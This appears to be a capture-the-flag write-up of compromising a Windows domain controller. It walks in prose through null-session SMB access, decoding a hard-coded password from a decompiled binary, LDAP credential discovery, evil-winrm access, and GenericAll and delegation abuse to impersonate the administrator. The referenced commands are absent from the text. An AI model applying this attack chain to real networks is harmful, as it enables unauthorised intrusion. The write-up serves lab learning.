Nmap scan:
I found that SMB accepts null credentials for this machine:
Viewing the support-tools share, we find that it contains multiple binaries.
There's only one that was interesting, and it was the UserInfo.exe file. I took it back to my Windows VM and used dnSpy to open it.
When decompiled, it seems that the binary was sending LDAP queries:
Looking around, I also found this password function.
We can decode this easily using some Python and following their logic.
This would output the password.
Then, since the binary does LDAP queries, I wanted to use the username and password given by the binary to query LDAP.
On analysing the output, I found a hidden password for the support user.
We can then evil-winrm in as this support user.
Once in, I started Bloodhound to enumerate for me. Upon reviewing the contents, I saw this interesting set of permissions over the DC.
We can use PowerMad and PowerView to abuse the GenericAll privileges.
We can use this set of commands to create a new user:
This would spawn in a shell for us.
How it works is that we first create a new user that has the Constrained Delegation privilege. Then, we are able to impersonate the administrator and request a ticket that we can use to gain a shell with smbexec.py.
